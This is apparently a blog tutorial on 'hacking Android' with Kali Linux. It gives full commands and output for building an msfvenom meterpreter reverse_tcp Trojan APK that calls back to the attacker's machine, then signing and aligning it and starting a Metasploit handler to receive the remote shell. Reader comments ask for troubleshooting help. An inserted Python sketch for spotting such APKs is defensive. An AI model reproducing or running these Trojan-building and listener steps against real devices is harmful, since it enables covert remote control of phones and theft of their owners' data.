In my earlier post we learned how to hack Windows using Kali Linux. This time we are going to hack Android with Kali Linux. We make use of the msfvenom tool in Kali Linux, which is a combination of Msfpayload and Msfencode.
NOTE: This tutorial is for educational purposes only.
Prerequisites to hack Android
- Kali Linux
- Android phone: for demonstration purposes we have used the Android emulator provided by Google.
Steps to hack Android
1. Create Payload
To create the Trojan for the Android hack, we need to create a payload using the msfvenom utility in Kali Linux.
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.202.128 LPORT=4444 R > /root/Desktop/my0704.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes
In the above command, the LHOST IP is the address of the Kali Linux machine, as shown by the ifconfig command.
The above command creates a Trojan apk file which can be installed on the target phone to exploit it. However, before this we need to sign the apk so that it installs properly. Follow the steps below to do so.
a. Create Keystore:
root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000
The above command asks a list of questions and prompts for a password.
b. Sign the created apk file using jarsigner.
root@kali:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/Desktop/my0704.apk app
Enter Passphrase for keystore:
adding: META-INF/APP.SF
adding: META-INF/APP.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.
Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.
c. Verify the apk created using jarsigner.
root@kali:~# jarsigner -verify -verbose -certs /root/Desktop/my0704.apk
d. Optimize the apk file using zipalign.
Before proceeding, install zipalign using the command below:
apt-get install zipalign
Now let's optimize the apk.
root@kali:~# zipalign -v 4 /root/Desktop/my0704.apk /root/Desktop/my0704_sign.apk
Verifying alignment of /root/Desktop/my0704_sign.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
281 META-INF/APP.SF (OK - compressed)
623 META-INF/APP.RSA (OK - compressed)
1752 META-INF/ (OK)
1802 META-INF/SIGNFILE.SF (OK - compressed)
2087 META-INF/SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful
So the final apk which we are using to hack Android is named “my0704_sign.apk”.
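Seen from the defender's side, the signing steps above leave recognisable traits in the file: a JAR (v1) signature under META-INF with SHA1 digests and no APK Signature Scheme v2 block. The Python sketch below is an added example, not part of the original post, that triages an APK for those traits; the function names and the sample archive are constructed for illustration, and the result is a triage signal rather than proof of malice.

```python
import io
import struct
import zipfile

APK_SIG_MAGIC = b"APK Sig Block 42"  # last 16 bytes of an APK Signing Block (v2+)

def triage_apk(data: bytes) -> dict:
    """Summarise how an APK (raw bytes) is signed; a triage signal, not a verdict."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        meta = [n for n in zf.namelist() if n.upper().startswith("META-INF/")]
        sf_files = [n for n in meta if n.upper().endswith(".SF")]
        sig_files = [n for n in meta if n.upper().endswith((".RSA", ".DSA", ".EC"))]
        digests = set()
        for name in sf_files:
            # jarsigner records its digest algorithm in the .SF header,
            # e.g. "SHA1-Digest-Manifest:" or "SHA-256-Digest-Manifest:".
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                key = line.split(":", 1)[0].strip()
                if key.endswith("-Digest-Manifest"):
                    digests.add(key[: -len("-Digest-Manifest")])
    # The v2+ signing block sits directly before the ZIP central directory,
    # whose offset is stored 16 bytes into the End of Central Directory record.
    eocd = data.rfind(b"PK\x05\x06")
    cd_offset = struct.unpack_from("<I", data, eocd + 16)[0]
    has_v2 = cd_offset >= 16 and data[cd_offset - 16:cd_offset] == APK_SIG_MAGIC
    has_v1 = bool(sf_files and sig_files)
    return {
        "v1_jar_signature": has_v1,
        "v2_signing_block": has_v2,
        "v1_only": has_v1 and not has_v2,
        "sf_digests": sorted(digests),
        "weak_digest": bool(digests & {"SHA1", "MD5"}),
    }

def build_sample() -> bytes:
    """Constructed stand-in for a jarsigner-signed APK (placeholder contents)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("META-INF/APP.SF",
                    "Signature-Version: 1.0\nSHA1-Digest-Manifest: AAAA\n")
        zf.writestr("META-INF/APP.RSA", b"constructed placeholder")
        zf.writestr("classes.dex", b"constructed placeholder")
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_apk(build_sample()))
```

The check does not handle ZIP64 archives and does not validate the signature itself; it only reports which signing scheme and digest the file carries.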
2. Start msfconsole on Kali Linux for exploiting the Android phone.
root@kali:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
http://metasploit.com
Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
At the above msf prompt, launch the multi handler exploit and set the Android payload using the commands below:
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) >
In the commands below we use the Kali Linux IP for the exploit, which can be taken from the ifconfig command on Kali Linux. We also use port number 4444 for the exploit.
msf exploit(handler) > set LHOST 192.168.202.128
LHOST => 192.168.202.128
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) >
Finally, give the exploit command, which will wait until the apk is executed on the Android phone.
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.202.128:4444
[*] Starting the payload handler...
Execution of the apk on Android.
Here we are using the Android emulator provided by Google. Hence you need to download the ISO image from this website.
Once downloaded, you can create a normal virtual machine in VMware and mount this ISO on the VM to start it. Set up the Android VM using your Gmail ID.
stuntfamz says
The session just ends after less than 10 seconds, how can I solve this issue?
noone says
How to install jarsigner in Kali Linux Lite?